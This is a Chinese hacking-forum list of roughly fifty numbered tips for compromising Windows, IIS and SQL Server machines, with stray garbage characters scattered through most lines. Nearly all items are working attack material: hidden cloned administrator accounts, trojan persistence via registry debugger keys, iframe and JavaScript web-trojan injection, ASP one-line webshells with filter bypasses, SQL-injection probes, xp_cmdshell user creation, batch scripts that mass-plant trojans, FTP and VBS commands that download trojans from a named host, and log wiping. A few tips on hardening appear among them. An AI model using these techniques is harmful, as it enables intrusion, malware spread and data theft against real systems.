Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
1 {$ Y9 | z# wcacls C:\windows\system32 /G hqw20:R" [ [8 d/ q9 Q8 b
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
" X+ y( E! ]& `/ s% i5 x恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F2 r& r0 I9 ]' n& Q( E0 }' L
$ x f1 L( Y O2 I6 |# x: y) v* a/ C& i' G
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。3 s& q6 l5 T2 ^) W
8 `- h( a. h2 H* \: f& v
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。$ ?' s5 e2 A0 w' _+ Q% E3 J
* t" J6 Y2 T7 Y7 `+ M% T1 M
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
5 s1 t/ `- Z5 T1 p1 {. q
8 c9 M, y) C/ y- M$ P. \/ U5、利用INF文件来修改注册表
3 I) w/ `' ]3 u9 @) v" @3 S[Version]$ w/ `. P% A# o C0 w v
Signature="$CHICAGO$" Q& Z" @, K9 `4 ?9 `' {0 g
[Defaultinstall]
~/ G8 U3 \' o; qaddREG=Ating
9 J# U+ ?* Y# Z# e4 s+ a' s[Ating]+ m' _( T$ M |5 l0 T9 d/ a
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"$ {; h8 z' `& r$ C+ c+ X
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:7 ?8 r/ ]' D" n# D) O$ }9 f) g2 U
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径4 Q: I4 W& z3 i. f
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
5 Z! `7 Y# N& Q* Y" R1 JHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
. A) l+ z0 r# ^! \" t7 I; z+ nHKEY_CURRENT_CONFIG 简写为 HKCC
2 S8 c" ?# J W% Q0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
( |) H7 Y( C& T9 d4 F* G/ T"1"这里代表是写入或删除注册表键值中的具体数据2 F7 O v$ Q7 Z) S+ w
9 v$ \: Z3 ]- w3 }1 D4 Y
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
; x2 e! F1 E- Y6 I. D0 W9 V多了一步就是在防火墙里添加个端口,然后导出其键值
# A' c/ X" Q( Z) z7 }3 v8 Y; {7 `$ h[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]% u; ^0 G" p1 B: ?1 Q5 T9 ]1 L
z' u3 }" s4 z; s& j* a6 m7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽( z' b0 l: s. b5 P" T- I
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
5 ^2 o/ T! R6 f- B% _ v
' T4 M9 f9 A8 G4 q! ?/ _& o+ K; u8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
8 [/ G0 z6 A4 Z
/ d. K+ {* _7 @/ Q( o0 R9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,6 U: `$ @& r# K9 W% m
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
% ?1 f0 r5 |4 N+ j5 M- k
4 E0 H2 p% Q M" [10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
9 S/ C, U& p+ B9 E; J
* z2 z- n% x6 h- h& f i5 ?; n% `- p11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
( a6 E; q; G7 G! u6 u" ]用法:xsniff –pass –hide –log pass.txt& i% }& e4 b6 N0 V7 Y" ?; R
0 e. ^) e% X; O: ?
12、google搜索的艺术
+ P9 ~) ~5 j; o$ ^' n! `; b1 p! U搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”$ i: ?' P$ k! u
或“字符串的语法错误”可以找到很多sql注入漏洞。7 B/ C" J$ j+ |* w5 D
# B' g6 M3 x# H. B
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。; g1 E8 [# w2 I) a+ c! {4 z. n
# z, F5 B& b1 X" ?8 J" T2 S14、cmd中输入 nc –vv –l –p 1987" q5 l S& i; a6 [& x" P5 g' s) c7 y
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃& b2 u/ I9 B- e; a" n+ z- C
3 J0 s% ]3 o8 ^, ] a# j
15、制作T++木马,先写个ating.hta文件,内容为) J5 r e' @3 N& w
<script language="VBScript">4 L& P8 i- B; [( Z: M; |/ r
set wshshell=createobject ("wscript.shell" )
, v5 w8 c0 d0 ^& I, `a=wshshell.run("你马的名称",1)
9 e% R* u5 s: E" i5 ^window.close
" U$ x/ a4 i) [) _; f; t c</script>0 V, o: m1 _0 J+ `: {1 H$ R$ L
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
* l0 P# a3 {$ j' q& ~' D
- b# q- }4 e1 `7 M: S; G7 O" V16、搜索栏里输入# K/ d: Z4 Q+ @% N% Y7 v+ H" x; Y- u8 C! ~
关键字%'and 1=1 and '%'='9 Q6 v# _! j0 ]2 X* P" X# a0 {; R& |
关键字%'and 1=2 and '%'='* L9 ?: ]9 T& \% c1 T# S- i
比较不同处 可以作为注入的特征字符2 i8 b: a9 S# B |3 q$ b9 K
: W% H3 ?9 k7 J6 V$ y17、挂马代码<html>
: i* M. _/ B% W$ X<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
& g. j8 @1 h& J6 Y</html>8 I7 b! t0 q, W- k" I+ v8 _* y3 T
, l- U0 w! |; u18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
0 m% V6 D0 U) q3 nnet localgroup administrators还是可以看出Guest是管理员来。
7 V! } M; C0 o) y) O2 f1 A9 g7 L d5 V; W- {& E
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
3 P6 o& T! G$ Y2 r7 _$ l' T1 {1 }) ~用法: 安装: instsrv.exe 服务名称 路径7 E; w% u2 l+ N+ }7 Q- q/ Q8 |
卸载: instsrv.exe 服务名称 REMOVE
8 L5 L& a6 u9 G0 E& G( y$ r. i4 D: a/ K
, \ u! }( r& H6 |2 k$ P
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉% u5 Y1 `+ W" u3 A7 k; H
不能注入时要第一时间想到%5c暴库。
* Z: {) q+ V1 L) g8 k1 Q% ~
9 K5 j: ?$ T, L! d6 Y, }2 U/ H22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~) s* r& n$ T% Y: X6 e; k# r
* ?0 w. N# g2 {9 M% @; P. q& O) J23、缺少xp_cmdshell时
% v8 K. H8 q; `2 u0 l9 ]. _! x7 f尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
6 b: ]$ ^. g/ _- n假如恢复不成功,可以尝试直接加用户(针对开3389的)2 f% v# N- F5 r% Y
declare @o int. a+ V# W; j# I" {' |/ U: A
exec sp_oacreate 'wscript.shell',@o out1 p6 g+ m/ R9 i7 d @' D
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员6 m' g+ A6 S& K9 c, Q: Y9 ~
8 m' d7 P X' [# L% E24.批量种植木马.bat
) Q% Y' l* S, Y# ifor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
3 A, F0 a7 k7 Q; F& sfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间' y$ L% a& N- B3 n
扫描地址.txt里每个主机名一行 用\\开头# f ?- N% q! X
7 Q0 ], r+ `4 j$ p25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。# F+ `6 p# X3 J- n3 Q9 G
0 s# }7 M) l% ^4 V& Q) q+ D
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
/ A9 n, }7 \& v% V3 e将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
" Y; _! ^: Z5 l+ |% X1 g.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
/ G) u6 Y1 ^+ U( Y2 V' E, K
3 h5 i& q' }+ `- t; c+ R27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
& m% {$ U& K% H$ C. @' i然后用#clear logg和#clear line vty *删除日志6 K) U* f: x- f3 `7 j+ v1 U" |
/ T/ \# u7 Y9 ~. m& } F. ]/ d28、电脑坏了省去重新安装系统的方法
; H+ g, d' U9 d* l V8 `纯dos下执行,
, G4 D' H( f- Fxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config2 m9 y/ i. Q3 Z# s
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config/ s8 J' O+ ?; [3 L( E& D& f
; \+ d/ u# e/ q
29、解决TCP/IP筛选 在注册表里有三处,分别是:1 {$ r+ {) j7 U9 c M9 i
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
/ T6 X" Z2 ~+ A9 ]HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip( `$ x7 J2 g! N* p
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip5 b9 j+ r. r5 r; l! d
分别用" \% V- f1 c$ ]6 X! Y
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
: K* e4 e5 g. c, i( P7 pregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
z; F3 Q& J4 x2 H( S5 oregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip) z4 ?& A4 E1 y0 y# B( [5 V
命令来导出注册表项3 z/ x/ l- J1 A0 p/ Z( y
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
5 A# L1 {$ m7 C; F# a- M- ?9 o改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用+ F- i1 f8 [0 t% X$ a+ a
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
& j! A+ w4 s: J# `3 |! m9 u( |# q3 X4 F {
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
/ b, J2 \5 A+ N8 \4 C7 _SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
3 i( d1 r0 ^6 l% V# ]- Q5 m; t
4 F' V$ m2 W/ y! Q31、全手工打造开3389工具+ b1 `1 L$ C" E! g
打开记事本,编辑内容如下:
8 n7 O; B) u% K" ~, L0 F# k: u1 Lecho [Components] > c:\sql
6 m" X2 O# y5 P mecho TSEnable = on >> c:\sql
& k. D$ L0 Z* D4 Z; T5 zsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
" B& q/ _% U) M1 t: F( a编辑好后存为BAT文件,上传至肉鸡,执行
# n b. N+ x. O3 T, M& V$ @9 l& |1 y1 f z9 q, K! }. s
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
/ p/ i* G- q/ X& j2 s
8 Q1 G( x( r7 @9 H, y0 m33、让服务器重启
6 j# o" z& ]( ?) u8 ]4 B/ w写个bat死循环:' X( Z( k* K: u6 U2 K" h
@echo off
( ? ^% ` K. f9 ]2 w:loop1) E3 L! Z/ r) `3 M3 |/ Q
cls6 C! H# p3 G! r4 M( v, z
start cmd.exe) d4 L I( Y% r: S4 i0 t0 H6 Z
goto loop1
" {/ H: }& {2 q; S$ t保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
; [! M" U" `2 J% P
2 p' d1 }# T' O: E- [! i" d34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
& m9 v- v+ C2 q! F( [@echo off
1 ?+ H) q: D* h" u3 tdate /t >c:/3389.txt
t, G2 c( u3 atime /t >>c:/3389.txt
4 J ~. D: c' P3 _attrib +s +h c:/3389.bat
1 [+ y( D0 Q# `; H/ }( Cattrib +s +h c:/3389.txt
1 H r" U9 e! l4 i3 |netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
: ~' P3 A9 `+ f: {: j4 ]并保存为3389.bat4 I" _2 t1 h; l. @3 M! f
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
# E3 _+ @: x$ x; w
- Y0 ^/ K9 N( |+ T' N3 I! ?35、有时候提不了权限的话,试试这个命令,在命令行里输入:
/ O& C9 W) C% p: Pstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)! O, ]4 \4 x* K4 ^6 t! w+ o* N: l
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
$ J% ~( I+ b& X2 q0 j% g7 E" A, @. }9 \# K0 b
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
2 V; G- U4 z9 O+ x/ ^echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
3 b7 V7 Q" T4 t6 N3 `* J. necho 你的FTP账号 >>c:\1.bat //输入账号
; l' q7 I! j( d& e5 }0 X! s( Gecho 你的FTP密码 >>c:\1.bat //输入密码2 G x/ w8 W2 s; d8 @) z+ a
echo bin >>c:\1.bat //登入
( q) z8 a" x; ~! ^echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么: L7 ] L5 P( X( J5 @
echo bye >>c:\1.bat //退出
' s# D' S/ b/ ?然后执行ftp -s:c:\1.bat即可8 J; t2 P2 y2 U, w! ] o
: s! N& l; K9 b* V' n q5 W37、修改注册表开3389两法! L% d+ W" E( q" b" u
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
$ A4 n3 k) t4 `4 d" ]5 f4 Z2 {echo Windows Registry Editor Version 5.00 >>3389.reg
I& Q; G/ a$ n6 |# ?$ Jecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg0 [- f" F5 f( {/ |% a
echo "Enabled"="0" >>3389.reg3 A9 ?, h* V0 U( ]0 R* J0 Y
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows$ l5 L8 x+ L7 Y
NT\CurrentVersion\Winlogon] >>3389.reg
2 Z$ b$ ]* Z8 e4 Q( eecho "ShutdownWithoutLogon"="0" >>3389.reg% Y7 Z ]; {" [
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
' S( `% u1 N0 k7 y, e3 N; w>>3389.reg9 H( O$ V" M# r0 y3 r! `2 I
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg4 h+ h- v+ ~4 H4 j3 O' n- o
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]9 O. w* u$ R& Z
>>3389.reg
$ C; j- z6 f9 T6 U. M$ L' c' g1 ^' gecho "TSEnabled"=dword:00000001 >>3389.reg
4 H: T7 G! Y, Xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg) X( F# C- W! c9 l
echo "Start"=dword:00000002 >>3389.reg
9 ~4 G: _1 Q# l* Y7 ~ E) @6 iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]% _, `8 U& f+ j3 L" x* C4 ]
>>3389.reg! R$ S6 h% _! h5 ]* ^4 i8 `
echo "Start"=dword:00000002 >>3389.reg5 L. |9 n/ g3 K' S- Q9 g% o( g
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg# b' O2 r: m0 ^* g# B. B- k
echo "Hotkey"="1" >>3389.reg
/ E4 W4 d& g/ Z: v& W( Q; jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
8 @; H( b5 P! e, z3 z6 M- ~Server\Wds\rdpwd\Tds\tcp] >>3389.reg! T }4 U. n1 ?
echo "PortNumber"=dword:00000D3D >>3389.reg5 E8 X/ y+ c1 f" l$ ~
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
1 D- Y' z: V6 Y+ UServer\WinStations\RDP-Tcp] >>3389.reg
% v [6 [7 T/ ?8 p. v& _1 cecho "PortNumber"=dword:00000D3D >>3389.reg
, N, @, D' {+ I% q把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。4 o0 H8 F0 k; L! c+ M
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
7 J3 K, j( r" u) \% a1 B6 I/ K因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效7 f5 X( Y! R7 I6 C E: x* H$ F! T
(2)winxp和win2003终端开启
{# I8 e9 R; y5 c$ d2 D+ q9 @用以下ECHO代码写一个REG文件:; f& Y/ i7 n. }5 ]8 Q) a4 T3 y
echo Windows Registry Editor Version 5.00>>3389.reg" K6 E& d# H( C% X$ |) ]3 M
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal" S5 I$ c" E, l" I% S+ F% c% ?
Server]>>3389.reg: x! {0 @/ q; E3 F8 h( C
echo "fDenyTSConnections"=dword:00000000>>3389.reg0 a h0 ]* O" y' K
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
. D; V2 |, q; U$ {1 |- N OServer\Wds\rdpwd\Tds\tcp]>>3389.reg' S, H3 u- m- _# c
echo "PortNumber"=dword:00000d3d>>3389.reg
3 T/ p: x7 O: R3 Iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
' J% K9 D3 ]9 s* X! JServer\WinStations\RDP-Tcp]>>3389.reg
. J$ t6 k4 I6 Uecho "PortNumber"=dword:00000d3d>>3389.reg& N$ w0 u! E# R' q' w
然后regedit /s 3389.reg del 3389.reg( O# \ I1 P+ H) @) K! y% M
XP下不论开终端还是改终端端口都不需重启( `; ^- u& }8 C. M7 ?
. R5 ^. y4 C, ~2 M38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
6 {$ @. S2 S* ^$ t% t4 [ y/ b2 w用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
' c2 y+ w% S0 G# O; A3 B$ D+ r* S9 [% `0 o5 S
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
4 P& y& Y$ x" Y3 R4 ^3 a! ]' S(1)数据库文件名应复杂并要有特殊字符6 g/ i* H0 `" E8 q! E$ c
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
+ r2 X- o- k7 |% n将conn.asp文档中的: U- D3 Z% F2 X0 M" V4 a* [
DBPath = Server.MapPath("数据库.mdb")9 D. t- E: i5 V- Q# }+ g
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath8 P( ^7 t% b! Z& R) A" E3 ]
; y9 t6 [- H+ P) F" k修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
- O+ M0 b( t6 u$ A+ F/ e(3)不放在WEB目录里0 `- F( E9 e8 E% `7 u4 D8 V3 _
p9 W5 u& T; _ \
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉- C8 c- u% q! x7 U
可以写两个bat文件$ X" _! h/ Y: V" x. U' Z- H& a
@echo off
- M; @/ L, \! @3 q+ v@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
! N ]* z4 v/ p8 W' ^@del c:\winnt\system32\query.exe; r2 ]# U5 A" ~
@del %SYSTEMROOT%\system32\dllcache\query.exe$ a+ {9 V* S, g2 C. r
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
. s. M; h4 l3 s6 r* Y& S+ r0 s3 q4 i1 H e( g5 i7 C
@echo off
& {: Q9 t3 _. }- e; b4 _0 w% n@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe$ y' [- `9 { P3 j% L) ?/ r
@del c:\winnt\system32\tsadmin.exe
5 g/ z* S5 r& b8 h1 `9 p* X K8 {6 m@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex; l; e! g! T( k6 X; t
$ ]; s! l7 R: _4 }
41、映射对方盘符
, r7 `5 D# V/ Y! ntelnet到他的机器上,/ m+ y( L3 G' u2 R3 E, P) Y
net share 查看有没有默认共享 如果没有,那么就接着运行2 ~0 Z4 j' @# @- y
net share c$=c:
p7 Y0 P D3 Jnet share现在有c$
/ T0 T8 C( }6 i2 w4 P0 P( l4 b在自己的机器上运行
9 W1 t- z/ O4 enet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K5 v& ?0 Y5 X1 F" R6 S
/ C Z4 ~0 X1 |6 r1 n, N1 J( Q, w42、一些很有用的老知识
2 y9 ~) N' j( t! I- ]/ Ntype c:\boot.ini ( 查看系统版本 )' c' k$ c) l" O5 R* @- H3 T1 N& X
net start (查看已经启动的服务)
; Z9 ~5 T! ]7 ]. y& s. G2 Aquery user ( 查看当前终端连接 )& E0 N4 M0 j( N1 }) X5 _
net user ( 查看当前用户 )
4 y M- a4 N4 ]: [# o" anet user 用户 密码/add ( 建立账号 )3 [* v" u8 r" `3 N, n% M( w
net localgroup administrators 用户 /add (提升某用户为管理员)
, n( u% F) v* r9 B3 D `) mipconfig -all ( 查看IP什么的 )( o- g- W% H$ J
netstat -an ( 查看当前网络状态 )' g' I. s" x0 r3 a
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码), s% u* u/ t4 R8 T
克隆时Administrator对应1F4% Z. }/ A* j+ ~1 C
guest对应1F5
8 u7 h" H* Q% \ _- U" g! Y- Ctsinternetuser对应3E8& H- r3 L4 B" j
* |% k% X& H8 k# `43、如果对方没开3389,但是装了Remote Administrator Service
/ j. i3 L$ a) P" j; N5 q用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
* O4 `0 S+ C5 F2 v _7 \解释:用serv-u漏洞导入自己配制好的radmin的注册表信息7 a2 @9 v7 }. @+ Q3 j; O+ g
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
7 @* m; V7 x* m, Q. J; _
" b4 g- z+ [9 M$ E& ]$ {, t, s44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
8 M8 [' ?# ^4 y$ s" T3 q本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口). H! R9 G" ?5 i: _# A8 U
/ L0 ]0 I" z5 {45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
$ @" d+ e2 U7 G: X( Aecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
5 L# E5 r2 n- Y! K9 G5 |, ] f^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
: c" e% f8 Q2 s$ _CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =( M# j- x6 y1 S& e, E1 _3 Q. T; e
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs! J9 N3 k" x. v- G( Y+ _* {
(这是完整的一句话,其中没有换行符)1 `9 { R7 I9 ^" @
然后下载:9 c; \4 G5 Y" x9 C1 A9 l! r- l2 D
cscript down.vbs http://www.hack520.org/hack.exe hack.exe( j" Z$ D/ s' n: D7 T7 \
4 p3 H& f9 [5 `& |! X) v" F; t4 b
46、一句话木马成功依赖于两个条件:1 S5 }' _. z+ {1 Z" n6 h
1、服务端没有禁止adodb.Stream或FSO组件
0 N: K. i, Q% @- X2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
9 k& d L2 K" S* \7 E$ h* T0 J; e: s: R( }; l/ y$ j
47、利用DB_OWNER权限进行手工备份一句话木马的代码:0 R7 @+ t. m7 ~5 F
;alter database utsz set RECOVERY FULL--; [( I' r1 M3 d6 l2 ^1 X2 }0 }, Z( d5 F
;create table cmd (a image)--' r; D }& V. S s# j
;backup log utsz to disk = 'D:\cmd' with init--3 p' p* R; E M- R6 | z, g
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--! p9 i {& b5 f! P
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
9 i$ u5 `1 ]" W2 k' x注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。% l v1 Z2 ~% c- J
! B; H0 F E0 [$ E) m# G! a. b
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:0 ^. J" q6 r- [# G
b' G9 j7 G9 d- E0 V8 x6 g# R用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
2 }% W1 F$ A5 K; [, T所有会话用 'all'。1 o& l1 L- \, x( b: |; [
-s sessionid 列出会话的信息。
n. i" |: Z9 G( ~ R+ [5 H: ]/ g-k sessionid 终止会话。8 N4 O: q" l2 z q3 ?1 @. C% X* [, f. ~
-m sessionid 发送消息到会话。. J+ G% X* _% Y) E$ ]
6 F9 e0 s8 X# B8 O& e$ a- ?config 配置 telnet 服务器参数。
' [) f& L( E) W8 r; ]
6 d1 x/ E1 Z2 a& b) Tcommon_options 为:1 x ?! T! B }% ?+ G2 v, ]) E
-u user 指定要使用其凭据的用户
4 B M. X8 G/ v. b-p password 用户密码* [, d, a9 b; Z* ^9 W
3 D3 [6 Q' T- p- h) O
config_options 为:
0 {% @ n: g* b$ ~$ X1 R, Kdom = domain 设定用户的默认域1 R4 K$ e. U" j- N5 i
ctrlakeymap = yes|no 设定 ALT 键的映射, R; M$ ?' d5 o% t& e# r
timeout = hh:mm:ss 设定空闲会话超时值: k1 k4 c3 h4 i: J% c7 ^
timeoutactive = yes|no 启用空闲会话。
/ b( M* a+ ^8 t- Imaxfail = attempts 设定断开前失败的登录企图数。
5 ]4 M$ C# p5 f0 S$ bmaxconn = connections 设定最大连接数。) C8 S% k& J. w+ x$ N6 N
port = number 设定 telnet 端口。
$ G+ d" ^8 I, m/ H. ^' E6 Gsec = [+/-]NTLM [+/-]passwd
' I2 n* ?' x* d* ^6 f4 X# U3 H* Z8 T/ C设定身份验证机构
0 _ E1 U) c/ a7 nfname = file 指定审计文件名。
- @ B( z+ T9 G: B! s) p8 W- afsize = size 指定审计文件的最大尺寸(MB)。, |2 {6 l9 j9 b
mode = console|stream 指定操作模式。
: j8 }: b( k ?2 oauditlocation = eventlog|file|both y- r6 X+ s5 ?1 ]3 {
指定记录地点0 \% z$ Z+ Z4 c+ {& f9 Y, a8 i2 {
audit = [+/-]user [+/-]fail [+/-]admin! d6 Q* `) X9 I/ l- W
$ H% K# j+ p* y( @1 ^: C- Y
49、例如:在IE上访问:
! l% i7 F9 M+ v3 F# q7 D7 _ twww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
* T( D# T' @9 z* g, N/ Hhack.txt里面的代码是:1 K' n3 t6 c3 b# A3 s
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">* t% o+ e% L+ t) Y7 V+ C
把这个hack.txt发到你空间就可以了!$ d {- d+ J6 Z- k }4 D
这个可以利用来做网马哦!
; U4 _3 ~0 w M
, K% G- E3 K1 E$ f9 Y7 ?, W50、autorun的病毒可以通过手动限制!5 j# ^6 D0 ~' `" A
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
3 T( T0 d4 A7 ~* W {- m2,打开盘符用右键打开!切忌双击盘符~, z: O. _% |, q6 M. D+ r% a, N
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
7 b* Y" J3 |! o! _) H5 y o2 c4 T8 H$ |0 k2 ~2 L
51、log备份时的一句话木马:
' d/ p2 ]1 }2 Z5 Ka).<%%25Execute(request("go"))%%25>
~/ O/ \, r, X( b/ ] N9 n% wb).<%Execute(request("go"))%>
* S g- q5 E; h* z9 P6 L Dc).%><%execute request("go")%><%# J9 s( e7 Q0 a# ]# s
